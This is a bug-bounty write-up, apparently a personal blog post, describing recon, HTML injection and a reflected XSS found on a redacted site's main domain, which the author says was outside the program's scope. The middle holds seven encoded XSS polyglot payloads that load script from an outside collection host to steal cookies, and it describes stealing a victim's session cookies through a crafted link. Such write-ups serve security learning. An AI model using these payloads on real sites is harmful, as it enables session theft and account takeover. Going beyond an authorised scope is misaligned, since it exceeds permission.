.png)
6 days ago
18 BOOK THIS SPACE FOR AD
ARTICLE ADHello Infosec Community,
I’m Guru Prasad Pattanaik, aka TH3N00BH4CK3R. Before we start I want to give you the context behind my story. I come from a completely non-tech background(I have done a BSc in Physics but I really love technology). I just wanted to say that I started Bug Hunting recently like 6 months ago. I’m writing my first article so I’m a bit nervous about it. I humbly request everyone to please correct me if I go wrong somewhere. So with that being said let’s start.
My friend Yeshwanth and I collaboratively hunted on a private program on Bugcrowd i.e. redacted.com(as I cannot share the program's original name due to the company's security compliances), which fetched me my first collaboration bounty reward of $1000. In this write-up, I will share the methodology I used to get this.
I had submitted a bug on NASA and got a Hall of Fame for the same. I published my achievement story for the same on my LinkedIn and Instagram Accounts respectively. Suddenly, One fine day I received a text on my LinkedIn account from Yeshwanth regarding the collaboration on Bug Hunting. As I was new to the field and didn’t have many private invitations from the programs, I decided to agree and hunt collaboratively.
As most of us do, I tried running subfinder & amass tools to gather all possible subdomains of redacted.com. Sorted them using httpx tool. It gathered almost 100+ subdomains. I also did Google Dorking to gather unique or different subdomains.
The idea behind this is to get juicy subdomains or some unvisited or un-crawled subdomains.
I used a very popular browser extension called Wappalyzer to understand the tech stack behind the web application. I literally visited each and every domain to check it’s tech stack. I checked all subdomains based on their functionalities i.e. Sign-In/Sign-Up, Forget Password/Reset Password, Input Fields, etc.
I tried HTML Injection, EXIF meta-data leak, Rate Limiting on Forms/Account Creation and Deletion, Password Reset Poisoning, and Sensitive Information Disclosure but nothing worked for us.
After spending almost a week on testing, we found nothing.
The In-Scope of the Program says sandbox.redacted.com and *.api.redacted.com only. After spending a week’s time and getting zero results, we became frustrated. Yeshwanth said, let’s change the program as we are not getting anything but I had an intuition that I would get bugs on this web application. So I randomly visited redacted.com instead of sandbox.redacted.com. I saw a major difference there. The site sandbox.redacted.com only has limited functionalities of the main domain redacted.com.
This sparked a curiosity in my mind to even test the main domain. Although it was not in the scope of the program.
I immediately tested the input fields with the classic HTML Injection Payload but it didn’t work for me. I noticed that the website reflects the query so I decided to check the source code of the page. I checked for the reflections and got to know that it’s not using the proper sanitization methods. So I modified my payload and it worked for me.
Basic Payload: <h1>YOU HAVE BEEN HACKED</h1>Modified Payload: "><marquee>YOU HAVE BEEN HACKED</marquee>
I was really happy that finally after so much hard work I found this bug. I immediately called Yeshwanth and told him that I got this on the main site instead of the In-Scope Domain. As he was in college then, he said he would join me in some time. I was in a dilemma about whether this would be accepted or not but since it was on the main site. It gave me rays of hope to continue forward with the testing and escalate the issue.
Now, Since HTML Injection had worked here so I decided to try a Cross-Site-Scripting Attack. In the input field when I tried to XSS Payload it didn’t work.
So I read several reports on HackerOne and Medium regarding XSS. After reading many reports I got to know about bypassing XSS Filter and XSS Polygot Payloads. So, I created an account on xss.report.
I used an XSS Polygot payload from the xss.report and it worked here. In the dashboard, I received the report of the XSS being fired. My happiness was in seventh Heaven. Then I decided to even escalate further to Account Takeover as many of the reports say.
I used a document.cookie payload and encoded that to abstract the cookies from the redacted.com.
1. java%0d%0ascript%0d%0a:eval('var a=document.createElement(\'script\');a.src=\'https://xss.report/c/XXXXX\';document.body.appendChild(a)')
2. javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html " onmouseover=/*<svg/*/onload=(import(/https:\xss.report\c\XXXXX/.source))//>
3. java%0d%0ascript%0d%0a:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html " onmouseover=/*<svg/*/onload=(import(/https:\xss.report\c\XXXXX/.source))//>
4. "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL2d1cjkxNiI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>
5. %22%3E%3Cimg%20src=x%20id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL2d1cjkxNiI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=%20onerror=eval(atob(this.id))%3E
6. javascript:%22/*'/*%60/*--%3E%3C/noscript%3E%3C/title%3E%3C/textarea%3E%3C/style%3E%3C/template%3E%3C/noembed%3E%3C/script%3E%3Chtml%20%22%20onmouseover=/*<svg/*/onload=(import(/https:%5Cxss.report%5Cc%5CXXXX/.source))//%3E
7. java%0d%0ascript%0d%0a:%22/*'/*%60/*--%3E%3C/noscript%3E%3C/title%3E%3C/textarea%3E%3C/style%3E%3C/template%3E%3C/noembed%3E%3C/script%3E%3Chtml%20%22%20onmouseover=/*<svg/*/onload=(import(/https:%5Cxss.report%5Cc%5CXXXX/.source))//%3E
Now, as I have got the XSS Fired and received the cookies. I thought about escalating the bug to Account Takeover. For this, I installed a very famous browser extension called Cookie Editor. As this XSS Report contained my cookies only and this won't be accepted on Bugcrowd as it’s Self XSS. So, I decided to escalate this.
The RXSS was on the search parameter so I simply crafted the search query and opened that in a different browser. Once the link loaded, it also fired the RXSS and fetched the cookies of the victim. Now, as I have the cookies of the victim I tried editing the cookies using the cookie editor and then refreshing the page. But it didn’t work for me. (You can guide me in the comments, on why this wasn’t happening?)
Performing all this took time and I was scared, “what if this goes Duplicate or Out Of Scope?” So without wasting a single minute, I recorded the Proof-Of-Concept Video of the same with a detailed explanation. By midnight we submitted the bug on the program.
The program did not respond for the first 5 days. Trust me this phase was no less than a nightmare for both of us. On the first response for the submission, they asked us for cookies which got fired when they tried to reproduce the issue. We proceeded further with the required details but on the very next reply, they marked our submission as Out-Of-Scope. On seeing this, we both were in total shock. After this Yeshwant consoled me and I consoled him. All our expectations were shattered. But then, the next night around 0300 HRS Yeshwanth received a mail that our submission had been changed to P2 and its state was triaged. He also couldn’t believe this, so he immediately called me. We re-checked it almost 5–6 times as we couldn't believe our eyes.
Finally, after a week I Got My First Collaboration Bounty of $1000
I would like to thank all my mentors, friends, and fellow mates who always guided me, supported me, and helped me grow.
I hope you all enjoyed this and learned something new. I know this is not a very technically sound write-up but I’ll try to improvise next time onwards.
Your Feedback would mean a lot to me and help me even grow better.
Do Like, Share, and Comment !!!
Follow me on my Socials
LinkedIn: https://www.linkedin.com/in/guru-prasad-pattanaik/
Instagram: https://www.instagram.com/guru.p05/
Twitter: https://x.com/gurupra9161
Bengali (Bangladesh) · 
English (United States) ·